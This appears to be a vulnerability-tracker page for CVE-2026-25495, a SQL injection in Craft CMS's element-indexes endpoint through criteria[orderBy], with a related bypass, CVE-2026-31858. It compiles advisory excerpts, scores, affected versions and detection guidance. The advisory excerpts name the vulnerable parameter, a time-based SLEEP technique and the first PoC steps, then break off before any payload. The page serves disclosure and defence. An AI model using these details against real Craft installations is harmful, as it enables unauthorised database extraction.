CVE-2026-25495
published 2026-02-09CVE-2026-25495: Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the…
PriorityP261high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EPSS
0.50%
39.1th percentile
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the element-indexes/get-elements endpoint is vulnerable to SQL Injection via the criteria[orderBy] parameter (JSON body). The application fails to sanitize this input before using it in the database query. An attacker with Control Panel access can inject arbitrary SQL into the ORDER BY clause by omitting viewState[order] (or setting both to the same payload). This issue is patched in versions 4.16.18 and 5.8.22.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| craftcms | cms | — | — |
| craftcms | cms | >= 4.0.0-RC1 < 4.16.18 | 4.16.18 |
| craftcms | cms | >= 5.0.0-RC1 < 5.8.22 | 5.8.22 |
| craftcms | craft_cms | < 4.16.18 | 4.16.18 |
| craftcms | craft_cms | < 5.8.22 | 5.8.22 |
| craftcms | craft_cms | — | — |
| craftcms | craft_cms | — | — |
| craftcms | craft_cms | >= 5.0.1 < 5.9.9 | 5.9.9 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor POST requests to the `element-indexes/get-elements` endpoint for JSON bodies containing a `criteria[orderBy]` parameter, especially those omitting `viewState[order]` or setting both to the same value — indicative of ORDER BY SQL injection attempts. ↗
- →The same SQL injection vector (`criteria[orderBy]`) also applies to the `ElementSearchController::actionSearch()` endpoint (CVE-2026-31858), which did not receive the fix applied to ElementIndexesController — monitor both endpoints. ↗
- →Watch for boolean-based blind SQL injection patterns in `criteria[where]`, `criteria[orderBy]`, or other query properties submitted to Craft CMS Control Panel endpoints by any authenticated user. ↗
- ·Exploitation requires an authenticated Control Panel user — not unauthenticated. Scope detection rules accordingly to authenticated sessions targeting the affected endpoints. ↗
- ·The related bypass (CVE-2026-31858) lowers the privilege bar further — no admin role required, only any authenticated Control Panel user. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.7HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`
ghsa·2026-02-09
CVE-2026-25495 [HIGH] CWE-89 Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`
Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`
## Summary
The `element-indexes/get-elements` endpoint is vulnerable to **SQL Injection** via the `criteria[orderBy]` parameter (JSON body). The application fails to sanitize this input before using it in the database query.
An attacker with **Control Panel access** can inject arbitrary SQL into the `ORDER BY` clause by omitting `viewState[order]` (or setting both to the same payload).
> [!NOTE]
> The `ORDER BY` clause executes per row. `SLEEP(1)` on 10 rows = 10s delay.
---
## PoC
### Required Permissions
- Access to the Control Panel
### Steps to reproduce
1. Log in to the control panel
2. Navigate to any element index (e.g., **Users** `/admin/users`, **Entries**, **Assets**, etc.)
3. Intercept the `PO
OSV
Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`
osv·2026-02-09
CVE-2026-25495 [HIGH] Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`
Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`
## Summary
The `element-indexes/get-elements` endpoint is vulnerable to **SQL Injection** via the `criteria[orderBy]` parameter (JSON body). The application fails to sanitize this input before using it in the database query.
An attacker with **Control Panel access** can inject arbitrary SQL into the `ORDER BY` clause by omitting `viewState[order]` (or setting both to the same payload).
> [!NOTE]
> The `ORDER BY` clause executes per row. `SLEEP(1)` on 10 rows = 10s delay.
---
## PoC
### Required Permissions
- Access to the Control Panel
### Steps to reproduce
1. Log in to the control panel
2. Navigate to any element index (e.g., **Users** `/admin/users`, **Entries**, **Assets**, etc.)
3. Intercept the `PO
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-25495 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-25495 [HIGH] CVE-2026-25495 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25495 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the element-indexes/get-elements endpoint is vulnerable to SQL Injection via the criteria[orderBy] parameter (JSON body). The application fails to sanitize this input before using it in the database query. An attacker with Control Panel access can inject arbitrary SQL into the ORDER BY clause by omitting viewState[order] (or setting both to the same payload). This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
## 8.7
Score
Published February 9, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Relea
Wiz
CVE-2026-31858 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-31858 [HIGH] CVE-2026-31858 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31858 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). The ElementSearchController::actionSearch() endpoint is missing the unset() protection that was added to ElementIndexesController in CVE-2026-25495. The exact same SQL injection vulnerability (including criteria[orderBy], the original advisory vector) works on this controller because the fix was never applied to it. Any authenticated control panel user (no admin required) can inject arbitrary SQL via criteria[where], criteria[orderBy], or other query properties, and extract the full database contents via boolean-based blind injection. Users should update to the patched 5.9.9 release to mitigate the issue.
Source : NVD
## 8.7
Score
Published March 11, 2026
Severity HIGH
CNA Sc
2026-02-09
Published